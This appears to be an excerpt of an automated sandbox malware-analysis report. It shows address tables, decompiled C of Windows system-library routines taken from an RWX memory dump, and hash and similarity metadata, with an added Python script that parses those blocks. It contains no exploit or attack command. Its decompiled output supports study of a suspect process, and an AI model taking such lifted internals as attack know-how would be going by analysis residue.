                                                      0x0118be0f
                                                      0x0118be14
                                                      0x0118be19
                                                      0x0118be20
                                                      0x0118be25
                                                      0x0118be27
                                                      0x0118be35
                                                      0x0118be39
                                                      0x0118be46
                                                      0x0118be4f
                                                      0x0118be54
                                                      0x0118be56
                                                      0x0118bef8
                                                      0x0118bef8
                                                      0x00000000
                                                      0x0118be5c
                                                      0x0118be5c
                                                      0x0118be60
                                                      0x00000000
                                                      0x0118be66
                                                      0x0118be66
                                                      0x0118be7f
                                                      0x0118be84
                                                      0x0118be87
                                                      0x0118be89
                                                      0x0118be8b
                                                      0x0118be99
                                                      0x0118be9d
                                                      0x0118bea0
                                                      0x0118beac
                                                      0x0118beaf
                                                      0x0118beb1
                                                      0x0118beb3
                                                      0x0118beb3
                                                      0x00000000
                                                      0x0118bea2
                                                      0x0118bea2
                                                      0x00000000
                                                      0x0118bea2
                                                      0x0118be8d
                                                      0x0118be8d
                                                      0x0118be92
                                                      0x00000000
                                                      0x0118be92
                                                      0x0118be8b
                                                      0x0118be60
                                                      0x0118be3b
                                                      0x0118be3b
                                                      0x0118be3e
                                                      0x00000000
                                                      0x0118be40
                                                      0x0118be40
                                                      0x0118be44
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0118be44
                                                      0x0118be3e
                                                      0x0118be29
                                                      0x0118be29
                                                      0x00000000
                                                      0x0118be29
                                                      0x0118be27
                                                      0x00000000
                                                      0x0114fba7
                                                      0x0114fba7
                                                      0x0114fbab
                                                      0x0118bf02
                                                      0x0114fbb1
                                                      0x0114fbb1
                                                      0x0114fbb8
                                                      0x0114fbbd
                                                      0x0114fbbd
                                                      0x0114fbbf
                                                      0x0114fbbf
                                                      0x0114fbc5
                                                      0x0114fbcb
                                                      0x0114fbf8
                                                      0x0114fbf8
                                                      0x0114fbfa
                                                      0x00000000
                                                      0x0114fc00
                                                      0x0114fc00
                                                      0x0114fc03
                                                      0x00000000
                                                      0x0114fc09
                                                      0x0114fc09
                                                      0x0114fc0f
                                                      0x0114fc15
                                                      0x0114fc23
                                                      0x0114fc23
                                                      0x0114fc25
                                                      0x0114fc27
                                                      0x0114fc75
                                                      0x0114fc7c
                                                      0x0114fc84
                                                      0x00000000
                                                      0x0114fc29
                                                      0x0114fc29
                                                      0x0114fc2d
                                                      0x0114fc30
                                                      0x0118bf0f
                                                      0x00000000
                                                      0x0114fc36
                                                      0x0114fc38
                                                      0x0114fc3b
                                                      0x0114fc41
                                                      0x0118bf17
                                                      0x0118bf19
                                                      0x0118bf48
                                                      0x0118bf4b
                                                      0x00000000
                                                      0x0118bf1b
                                                      0x0118bf22
                                                      0x0118bf24
                                                      0x0118bf26
                                                      0x00000000
                                                      0x0118bf2c
                                                      0x0118bf37
                                                      0x0118bf39
                                                      0x0118bf3b
                                                      0x00000000
                                                      0x0118bf41
                                                      0x0118bf41
                                                      0x0118bf41
                                                      0x0118bf41
                                                      0x0118bf45
                                                      0x00000000
                                                      0x0118bf45
                                                      0x0118bf3b
                                                      0x0118bf26
                                                      0x00000000
                                                      0x0114fc47
                                                      0x0114fc47
                                                      0x0114fc49
                                                      0x0114fcb2
                                                      0x0114fcb4
                                                      0x0114fcb6
                                                      0x0114fcdc
                                                      0x0114fcdc
                                                      0x00000000
                                                      0x0114fcb8
                                                      0x0114fcc3
                                                      0x0114fcc5
                                                      0x0114fcc7
                                                      0x00000000
                                                      0x0114fcc9
                                                      0x0114fcc9
                                                      0x0114fccd
                                                      0x00000000
                                                      0x0114fccd
                                                      0x0114fcc7
                                                      0x00000000
                                                      0x0114fc4b
                                                      0x0114fc4b
                                                      0x0114fc4e
                                                      0x0114fc4e
                                                      0x0114fc51
                                                      0x0114fc51
                                                      0x0114fc54
                                                      0x0114fc5a
                                                      0x0114fc5c
                                                      0x0114fc5f
                                                      0x0114fc61
                                                      0x0114fc63
                                                      0x0114fc65
                                                      0x0114fc67
                                                      0x0114fc6e
                                                      0x0114fc72
                                                      0x0114fc72
                                                      0x0114fc72
                                                      0x0114fc72
                                                      0x0114fc67
                                                      0x0114fc61
                                                      0x00000000
                                                      0x0114fc5a
                                                      0x0114fc49
                                                      0x0114fc41
                                                      0x0114fc30
                                                      0x0114fc27
                                                      0x0114fc03
                                                      0x0114fbcd
                                                      0x0114fbd3
                                                      0x0114fbd9
                                                      0x0114fbdc
                                                      0x0114fbde
                                                      0x0114fc99
                                                      0x0114fc9b
                                                      0x0114fc9d
                                                      0x0114fcd5
                                                      0x0114fcd5
                                                      0x0114fc89
                                                      0x0114fc89
                                                      0x00000000
                                                      0x0114fc9f
                                                      0x0114fc9f
                                                      0x0114fca3
                                                      0x00000000
                                                      0x0114fca3
                                                      0x00000000
                                                      0x0114fbe4
                                                      0x0114fbe4
                                                      0x0114fbe4
                                                      0x0114fbe4
                                                      0x0114fbe9
                                                      0x0114fbf2
                                                      0x00000000
                                                      0x0114fbf2
                                                      0x0114fbde
                                                      0x0114fbcb
                                                      0x0114fbab
                                                      0x0114fc8b
                                                      0x0114fc8b
                                                      0x0114fc8c
                                                      0x0114fb80
                                                      0x0114fb72
                                                      0x0114fb5e
                                                      0x0114fc8d
                                                      0x0114fc91
                                                      0x0114fadf
                                                      0x0114fadf
                                                      0x0114fae1
                                                      0x0114fae4
                                                      0x0114fae7
                                                      0x0114faec
                                                      0x0114faf8
                                                      0x0114fb00
                                                      0x0114fb07
                                                      0x0114fb0f
                                                      0x0114fb0f
                                                      0x0114fb07
                                                      0x00000000
                                                      0x0114faf8
                                                      0x0114fadd

                                                      Strings
                                                      • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0118BE0F
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                      • API String ID: 0-865735534
                                                      • Opcode ID: 1736bd0a11869f141e6af955a050ed4b3089b75b4c4dcaffcde4b28921e08004
                                                      • Instruction ID: 0bd059518692b17d2f451f0b8780e0118c72a965c6fcd323bbb14d10e64735c7
                                                      • Opcode Fuzzy Hash: 1736bd0a11869f141e6af955a050ed4b3089b75b4c4dcaffcde4b28921e08004
                                                      • Instruction Fuzzy Hash: DFA10431B00A178FEB2EDF6CC450BAEB7A5AF44B24F054669D946DB781DB30D802CB95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 63%
                                                      			E01112D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                                                      				signed char _v8;
                                                      				signed int _v12;
                                                      				signed int _v16;
                                                      				signed int _v20;
                                                      				signed int _v24;
                                                      				intOrPtr _v28;
                                                      				intOrPtr _v32;
                                                      				signed int _v52;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				intOrPtr _t55;
                                                      				signed int _t57;
                                                      				signed int _t58;
                                                      				char* _t62;
                                                      				signed char* _t63;
                                                      				signed char* _t64;
                                                      				signed int _t67;
                                                      				signed int _t72;
                                                      				signed int _t77;
                                                      				signed int _t78;
                                                      				signed int _t88;
                                                      				intOrPtr _t89;
                                                      				signed char _t93;
                                                      				signed int _t97;
                                                      				signed int _t98;
                                                      				signed int _t102;
                                                      				signed int _t103;
                                                      				intOrPtr _t104;
                                                      				signed int _t105;
                                                      				signed int _t106;
                                                      				signed char _t109;
                                                      				signed int _t111;
                                                      				void* _t116;
                                                      
                                                      				_t102 = __edi;
                                                      				_t97 = __edx;
                                                      				_v12 = _v12 & 0x00000000;
                                                      				_t55 =  *[fs:0x18];
                                                      				_t109 = __ecx;
                                                      				_v8 = __edx;
                                                      				_t86 = 0;
                                                      				_v32 = _t55;
                                                      				_v24 = 0;
                                                      				_push(__edi);
                                                      				if(__ecx == 0x1205350) {
                                                      					_t86 = 1;
                                                      					_v24 = 1;
                                                      					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                                                      				}
                                                      				_t103 = _t102 | 0xffffffff;
                                                      				if( *0x1207bc8 != 0) {
                                                      					_push(0xc000004b);
                                                      					_push(_t103);
                                                      					E011597C0();
                                                      				}
                                                      				if( *0x12079c4 != 0) {
                                                      					_t57 = 0;
                                                      				} else {
                                                      					_t57 = 0x12079c8;
                                                      				}
                                                      				_v16 = _t57;
                                                      				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                                                      					_t93 = _t109;
                                                      					L23();
                                                      				}
                                                      				_t58 =  *_t109;
                                                      				if(_t58 == _t103) {
                                                      					__eflags =  *(_t109 + 0x14) & 0x01000000;
                                                      					_t58 = _t103;
                                                      					if(__eflags == 0) {
                                                      						_t93 = _t109;
                                                      						E01141624(_t86, __eflags);
                                                      						_t58 =  *_t109;
                                                      					}
                                                      				}
                                                      				_v20 = _v20 & 0x00000000;
                                                      				if(_t58 != _t103) {
                                                      					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                                                      				}
                                                      				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                                                      				_t88 = _v16;
                                                      				_v28 = _t104;
                                                      				L9:
                                                      				while(1) {
                                                      					if(E01137D50() != 0) {
                                                      						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                                                      					} else {
                                                      						_t62 = 0x7ffe0382;
                                                      					}
                                                      					if( *_t62 != 0) {
                                                      						_t63 =  *[fs:0x30];
                                                      						__eflags = _t63[0x240] & 0x00000002;
                                                      						if((_t63[0x240] & 0x00000002) != 0) {
                                                      							_t93 = _t109;
                                                      							E011AFE87(_t93);
                                                      						}
                                                      					}
                                                      					if(_t104 != 0xffffffff) {
                                                      						_push(_t88);
                                                      						_push(0);
                                                      						_push(_t104);
                                                      						_t64 = E01159520();
                                                      						goto L15;
                                                      					} else {
                                                      						while(1) {
                                                      							_t97 =  &_v8;
                                                      							_t64 = E0114E18B(_t109 + 4, _t97, 4, _t88, 0);
                                                      							if(_t64 == 0x102) {
                                                      								break;
                                                      							}
                                                      							_t93 =  *(_t109 + 4);
                                                      							_v8 = _t93;
                                                      							if((_t93 & 0x00000002) != 0) {
                                                      								continue;
                                                      							}
                                                      							L15:
                                                      							if(_t64 == 0x102) {
                                                      								break;
                                                      							}
                                                      							_t89 = _v24;
                                                      							if(_t64 < 0) {
                                                      								L0116DF30(_t93, _t97, _t64);
                                                      								_push(_t93);
                                                      								_t98 = _t97 | 0xffffffff;
                                                      								__eflags =  *0x1206901;
                                                      								_push(_t109);
                                                      								_v52 = _t98;
                                                      								if( *0x1206901 != 0) {
                                                      									_push(0);
                                                      									_push(1);
                                                      									_push(0);
                                                      									_push(0x100003);
                                                      									_push( &_v12);
                                                      									_t72 = E01159980();
                                                      									__eflags = _t72;
                                                      									if(_t72 < 0) {
                                                      										_v12 = _t98 | 0xffffffff;
                                                      									}
                                                      								}
                                                      								asm("lock cmpxchg [ecx], edx");
                                                      								_t111 = 0;
                                                      								__eflags = 0;
                                                      								if(0 != 0) {
                                                      									__eflags = _v12 - 0xffffffff;
                                                      									if(_v12 != 0xffffffff) {
                                                      										_push(_v12);
                                                      										E011595D0();
                                                      									}
                                                      								} else {
                                                      									_t111 = _v12;
                                                      								}
                                                      								return _t111;
                                                      							} else {
                                                      								if(_t89 != 0) {
                                                      									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                                                      									_t77 = E01137D50();
                                                      									__eflags = _t77;
                                                      									if(_t77 == 0) {
                                                      										_t64 = 0x7ffe0384;
                                                      									} else {
                                                      										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                                                      									}
                                                      									__eflags =  *_t64;
                                                      									if( *_t64 != 0) {
                                                      										_t64 =  *[fs:0x30];
                                                      										__eflags = _t64[0x240] & 0x00000004;
                                                      										if((_t64[0x240] & 0x00000004) != 0) {
                                                      											_t78 = E01137D50();
                                                      											__eflags = _t78;
                                                      											if(_t78 == 0) {
                                                      												_t64 = 0x7ffe0385;
                                                      											} else {
                                                      												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                                                      											}
                                                      											__eflags =  *_t64 & 0x00000020;
                                                      											if(( *_t64 & 0x00000020) != 0) {
                                                      												_t64 = E01197016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      								return _t64;
                                                      							}
                                                      						}
                                                      						_t97 = _t88;
                                                      						_t93 = _t109;
                                                      						E011AFDDA(_t97, _v12);
                                                      						_t105 =  *_t109;
                                                      						_t67 = _v12 + 1;
                                                      						_v12 = _t67;
                                                      						__eflags = _t105 - 0xffffffff;
                                                      						if(_t105 == 0xffffffff) {
                                                      							_t106 = 0;
                                                      							__eflags = 0;
                                                      						} else {
                                                      							_t106 =  *(_t105 + 0x14);
                                                      						}
                                                      						__eflags = _t67 - 2;
                                                      						if(_t67 > 2) {
                                                      							__eflags = _t109 - 0x1205350;
                                                      							if(_t109 != 0x1205350) {
                                                      								__eflags = _t106 - _v20;
                                                      								if(__eflags == 0) {
                                                      									_t93 = _t109;
                                                      									E011AFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                                                      								}
                                                      							}
                                                      						}
                                                      						_push("RTL: Re-Waiting\n");
                                                      						_push(0);
                                                      						_push(0x65);
                                                      						_v20 = _t106;
                                                      						E011A5720();
                                                      						_t104 = _v28;
                                                      						_t116 = _t116 + 0xc;
                                                      						continue;
                                                      					}
                                                      				}
			}

Instruction addresses for the listing above: 0x01112d8a to 0x01112ed7, with further blocks at 0x0116f9aa to 0x0116fb21 (per-line address column collapsed).

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Re-Waiting
                                                      • API String ID: 0-316354757
                                                      • Opcode ID: a1a8ab3432577f5fb5c5620ddcf51c898ecb32fd6c011fc2682a87c0b44a23ec
                                                      • Instruction ID: 5753da73e5ce374b2b4c145a033f9c30a0531ecdb91e261d5e5cb617718d3fd9
                                                      • Opcode Fuzzy Hash: a1a8ab3432577f5fb5c5620ddcf51c898ecb32fd6c011fc2682a87c0b44a23ec
                                                      • Instruction Fuzzy Hash: C9617731A01606DFEB3EDF6CD854B7EBBA9EB40718F250279E911972C1C7319902C782
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%
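
The Strings, Memory Dump Source, Similarity and Uniqueness blocks that follow each decompiled function are the part of this listing worth keeping in structured form: they tie a function label to the .sdmp it was lifted from, to the strings it references and to its opcode and instruction hashes. The Python below is an added example and is not part of the Joe Sandbox report or of the sandbox's own tooling. It parses those blocks (sample input copied from the two blocks on this page, decompiled bodies omitted) into records, derives each function's offset inside the dump from the label and the Offset field, and runs a few consistency checks. Splitting the .sdmp filename into process, snapshot, timestamp, base, protection and type fields is an assumption about the naming scheme; only the base field is cross-checked against the report's own Offset value, and 0x40 is read as the Win32 PAGE_EXECUTE_READWRITE constant.

```python
"""Parse per-function metadata blocks of a sandbox decompiler listing (added example)."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed sample: the two metadata blocks and C-code headers from the page,
# with the decompiled bodies and the address columns left out.
SAMPLE_REPORT = """\
Strings
• *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0118BE0F
Memory Dump Source
• Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
Similarity
• String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
• Opcode ID: 1736bd0a11869f141e6af955a050ed4b3089b75b4c4dcaffcde4b28921e08004
• Instruction ID: 0bd059518692b17d2f451f0b8780e0118c72a965c6fcd323bbb14d10e64735c7
• Opcode Fuzzy Hash: 1736bd0a11869f141e6af955a050ed4b3089b75b4c4dcaffcde4b28921e08004
• Instruction Fuzzy Hash: DFA10431B00A178FEB2EDF6CC450BAEB7A5AF44B24F054669D946DB781DB30D802CB95
Uniqueness
Uniqueness Score: -1.00%
C-Code - Quality: 63%
    E01112D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
    }
Strings
Memory Dump Source
• Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
Similarity
• String ID: RTL: Re-Waiting
• Opcode ID: a1a8ab3432577f5fb5c5620ddcf51c898ecb32fd6c011fc2682a87c0b44a23ec
• Instruction ID: 5753da73e5ce374b2b4c145a033f9c30a0531ecdb91e261d5e5cb617718d3fd9
• Opcode Fuzzy Hash: a1a8ab3432577f5fb5c5620ddcf51c898ecb32fd6c011fc2682a87c0b44a23ec
• Instruction Fuzzy Hash: C9617731A01606DFEB3EDF6CD854B7EBBA9EB40718F250279E911972C1C7319902C782
Uniqueness
Uniqueness Score: -1.00%
C-Code - Quality: 80%
    E011E0EA5(void* __ecx, void* __edx) {
"""

HEADER_RE = re.compile(r"^C-Code - Quality:\s*(\d+)%")
FUNC_RE = re.compile(r"^(E[0-9A-Fa-f]{8})\(")
SOURCE_RE = re.compile(r"^• Source File:\s*(\S+), Offset:\s*([0-9A-Fa-f]+), based on PE:\s*(true|false)")
FIELD_RE = re.compile(r"^• (String ID|Opcode ID|Instruction ID|Opcode Fuzzy Hash|Instruction Fuzzy Hash):\s*(.*)$")
XREF_RE = re.compile(r"^• (.*), xrefs:\s*([0-9A-Fa-f]+)$")
SCORE_RE = re.compile(r"^Uniqueness Score:\s*(-?[\d.]+)%")
SECTIONS = ("Strings", "Memory Dump Source", "Similarity", "Uniqueness")
PAGE_EXECUTE_READWRITE = 0x40  # Win32 memory protection constant


@dataclass
class FunctionRecord:
    function: Optional[str] = None   # decompiler label, e.g. E01112D8A
    quality: Optional[int] = None    # "C-Code - Quality: N%"
    source_file: Optional[str] = None
    dump_base: Optional[int] = None  # "Offset:" of the .sdmp
    based_on_pe: Optional[bool] = None
    strings: List[Tuple[str, str]] = field(default_factory=list)  # (text, xref)
    fields: Dict[str, str] = field(default_factory=dict)  # String ID, Opcode ID, ...
    uniqueness: Optional[float] = None
    complete: bool = False           # closed by a "Uniqueness Score" line

    def dump_offset(self) -> Optional[int]:
        """Offset of the function inside the .sdmp, assuming the dump is a flat
        copy of the region starting at dump_base (assumption)."""
        if not self.function or self.dump_base is None:
            return None
        return int(self.function[1:], 16) - self.dump_base


def parse_listing(text: str) -> List[FunctionRecord]:
    """One record per function; a block closes on its Uniqueness Score line."""
    records, cur, section = [], FunctionRecord(), None
    for line in (l.strip() for l in text.splitlines() if l.strip()):
        if m := HEADER_RE.match(line):
            if cur.function or cur.source_file:   # previous block never closed
                records.append(cur)
            cur, section = FunctionRecord(quality=int(m.group(1))), None
        elif (m := FUNC_RE.match(line)) and cur.function is None:
            cur.function = m.group(1).upper()
        elif line in SECTIONS:
            section = line
        elif m := SOURCE_RE.match(line):
            cur.source_file, cur.dump_base = m.group(1), int(m.group(2), 16)
            cur.based_on_pe = m.group(3) == "true"
        elif m := FIELD_RE.match(line):
            cur.fields[m.group(1)] = m.group(2).strip()
        elif (m := XREF_RE.match(line)) and section == "Strings":
            cur.strings.append((m.group(1), m.group(2).upper()))
        elif m := SCORE_RE.match(line):
            cur.uniqueness, cur.complete = float(m.group(1)), True
            records.append(cur)
            cur, section = FunctionRecord(), None
    if cur.function or cur.source_file:            # trailing truncated block
        records.append(cur)
    return records


def sdmp_fields(name: str) -> Dict[str, int]:
    """Dotted hex fields of a .sdmp name. The field names are an assumption
    about the naming scheme; only 'base' is cross-checked against Offset."""
    keys = ("process", "snapshot", "timestamp", "base", "protection", "type")
    return {k: int(v, 16) for k, v in zip(keys, name.rsplit(".sdmp", 1)[0].split("."))}


def check_record(rec: FunctionRecord) -> List[str]:
    """Findings worth a look before trusting or reusing the block's hashes."""
    out = []
    if not rec.complete:
        out.append("incomplete block (listing truncated)")
    if rec.source_file:
        f = sdmp_fields(rec.source_file)
        if f["base"] != rec.dump_base:
            out.append("dump name base %#x != Offset %#x" % (f["base"], rec.dump_base))
        if f["protection"] == PAGE_EXECUTE_READWRITE and rec.based_on_pe:
            out.append("RWX region carrying a PE image")
    if rec.fields.get("Opcode ID") != rec.fields.get("Opcode Fuzzy Hash"):
        out.append("Opcode ID differs from Opcode Fuzzy Hash")
    return out
```

Running `parse_listing(SAMPLE_REPORT)` yields three records: the block at the top of the page (its function label is off-page, so `function` stays `None`), the E01112D8A block at dump offset 0x22D8A, and the truncated E011E0EA5 block, which `check_record` flags as incomplete. Both complete records map to the same RWX dump with a PE header, which is exactly the region to carve out and compare across samples; the opcode and instruction IDs are the keys to deduplicate on.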

                                                      C-Code - Quality: 80%
                                                      			E011E0EA5(void* __ecx, void* __edx) {
                                                      				signed int _v20;
                                                      				char _v24;
                                                      				intOrPtr _v28;
                                                      				unsigned int _v32;
                                                      				signed int _v36;
                                                      				intOrPtr _v40;
                                                      				char _v44;
                                                      				intOrPtr _v64;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				signed int _t58;
                                                      				unsigned int _t60;
                                                      				intOrPtr _t62;
                                                      				char* _t67;
                                                      				char* _t69;
                                                      				void* _t80;
                                                      				void* _t83;
                                                      				intOrPtr _t93;
                                                      				intOrPtr _t115;
                                                      				char _t117;
                                                      				void* _t120;
                                                      
                                                      				_t83 = __edx;
                                                      				_t117 = 0;
                                                      				_t120 = __ecx;
                                                      				_v44 = 0;
                                                      				if(E011DFF69(__ecx,  &_v44,  &_v32) < 0) {
                                                      					L24:
                                                      					_t109 = _v44;
                                                      					if(_v44 != 0) {
                                                      						E011E1074(_t83, _t120, _t109, _t117, _t117);
                                                      					}
                                                      					L26:
                                                      					return _t117;
                                                      				}
                                                      				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                                                      				_t5 = _t83 + 1; // 0x1
                                                      				_v36 = _t5 << 0xc;
                                                      				_v40 = _t93;
                                                      				_t58 =  *(_t93 + 0xc) & 0x40000000;
                                                      				asm("sbb ebx, ebx");
                                                      				_t83 = ( ~_t58 & 0x0000003c) + 4;
                                                      				if(_t58 != 0) {
                                                      					_push(0);
                                                      					_push(0x14);
                                                      					_push( &_v24);
                                                      					_push(3);
                                                      					_push(_t93);
                                                      					_push(0xffffffff);
                                                      					_t80 = E01159730();
                                                      					_t115 = _v64;
                                                      					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                                                      						_push(_t93);
                                                      						E011DA80D(_t115, 1, _v20, _t117);
                                                      						_t83 = 4;
                                                      					}
                                                      				}
                                                      				if(E011DA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                                                      					goto L24;
                                                      				}
                                                      				_t60 = _v32;
                                                      				_t97 = (_t60 != 0x100000) + 1;
                                                      				_t83 = (_v44 -  *0x1208b04 >> 0x14) + (_v44 -  *0x1208b04 >> 0x14);
                                                      				_v28 = (_t60 != 0x100000) + 1;
                                                      				_t62 = _t83 + (_t60 >> 0x14) * 2;
                                                      				_v40 = _t62;
                                                      				if(_t83 >= _t62) {
                                                      					L10:
                                                      					asm("lock xadd [eax], ecx");
                                                      					asm("lock xadd [eax], ecx");
                                                      					if(E01137D50() == 0) {
                                                      						_t67 = 0x7ffe0380;
                                                      					} else {
                                                      						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                      					}
                                                      					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                      						E011D138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                                                      					}
                                                      					if(E01137D50() == 0) {
                                                      						_t69 = 0x7ffe0388;
                                                      					} else {
                                                      						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                      					}
                                                      					if( *_t69 != 0) {
                                                      						E011CFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                                                      					}
                                                      					if(( *0x1208724 & 0x00000008) != 0) {
                                                      						E011D52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                                                      					}
                                                      					_t117 = _v44;
                                                      					goto L26;
                                                      				}
                                                      				while(E011E15B5(0x1208ae4, _t83, _t97, _t97) >= 0) {
                                                      					_t97 = _v28;
                                                      					_t83 = _t83 + 2;
                                                      					if(_t83 < _v40) {
                                                      						continue;
                                                      					}
                                                      					goto L10;
                                                      				}
                                                      				goto L24;
                                                      			}

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: `
                                                      • API String ID: 0-2679148245
                                                      • Opcode ID: c2bccabc08908442f7da2e55fc7333dd3c0f6d41e7c963b8871290b48562a932
                                                      • Instruction ID: b6573a7a479fcc27aa9ba9c662554d8fd44b55f26f8e85043103e64d249cea7e
                                                      • Opcode Fuzzy Hash: c2bccabc08908442f7da2e55fc7333dd3c0f6d41e7c963b8871290b48562a932
                                                      • Instruction Fuzzy Hash: AD518E713047429FD329DF68D888B1BBBE5EBC8714F04092CFA9697291D770E806CB62
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 75%
                                                      			E0114F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                                                      				intOrPtr _v8;
                                                      				intOrPtr _v12;
                                                      				intOrPtr _v16;
                                                      				char* _v20;
                                                      				intOrPtr _v24;
                                                      				char _v28;
                                                      				intOrPtr _v32;
                                                      				char _v36;
                                                      				char _v44;
                                                      				char _v52;
                                                      				intOrPtr _v56;
                                                      				char _v60;
                                                      				intOrPtr _v72;
                                                      				void* _t51;
                                                      				void* _t58;
                                                      				signed short _t82;
                                                      				short _t84;
                                                      				signed int _t91;
                                                      				signed int _t100;
                                                      				signed short* _t103;
                                                      				void* _t108;
                                                      				intOrPtr* _t109;
                                                      
                                                      				_t103 = __ecx;
                                                      				_t82 = __edx;
                                                      				_t51 = E01134120(0, __ecx, 0,  &_v52, 0, 0, 0);
                                                      				if(_t51 >= 0) {
                                                      					_push(0x21);
                                                      					_push(3);
                                                      					_v56 =  *0x7ffe02dc;
                                                      					_v20 =  &_v52;
                                                      					_push( &_v44);
                                                      					_v28 = 0x18;
                                                      					_push( &_v28);
                                                      					_push(0x100020);
                                                      					_v24 = 0;
                                                      					_push( &_v60);
                                                      					_v16 = 0x40;
                                                      					_v12 = 0;
                                                      					_v8 = 0;
                                                      					_t58 = E01159830();
                                                      					_t87 =  *[fs:0x30];
                                                      					_t108 = _t58;
                                                      					L011377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                                                      					if(_t108 < 0) {
                                                      						L11:
                                                      						_t51 = _t108;
                                                      					} else {
                                                      						_push(4);
                                                      						_push(8);
                                                      						_push( &_v36);
                                                      						_push( &_v44);
                                                      						_push(_v60);
                                                      						_t108 = E01159990();
                                                      						if(_t108 < 0) {
                                                      							L10:
                                                      							_push(_v60);
                                                      							E011595D0();
                                                      							goto L11;
                                                      						} else {
                                                      							_t109 = L01134620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
                                                      							if(_t109 == 0) {
                                                      								_t108 = 0xc0000017;
                                                      								goto L10;
                                                      							} else {
                                                      								_t21 = _t109 + 0x18; // 0x18
                                                      								 *((intOrPtr*)(_t109 + 4)) = _v60;
                                                      								 *_t109 = 1;
                                                      								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                                                      								 *(_t109 + 0xe) = _t82;
                                                      								 *((intOrPtr*)(_t109 + 8)) = _v56;
                                                      								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                                                      								E0115F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
                                                      								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                      								 *((short*)(_t109 + 0xc)) =  *_t103;
                                                      								_t91 =  *_t103 & 0x0000ffff;
                                                      								_t100 = _t91 & 0xfffffffe;
                                                      								_t84 = 0x5c;
                                                      								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
                                                      									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                                                      										_push(_v60);
                                                      										E011595D0();
                                                      										L011377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                                                      										_t51 = 0xc0000106;
                                                      									} else {
                                                      										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                                                      										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                      										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                                                      										goto L5;
                                                      									}
                                                      								} else {
                                                      									L5:
                                                      									 *_a4 = _t109;
                                                      									_t51 = 0;
                                                      								}
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      				return _t51;
                                                      			}

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @
                                                      • API String ID: 0-2766056989
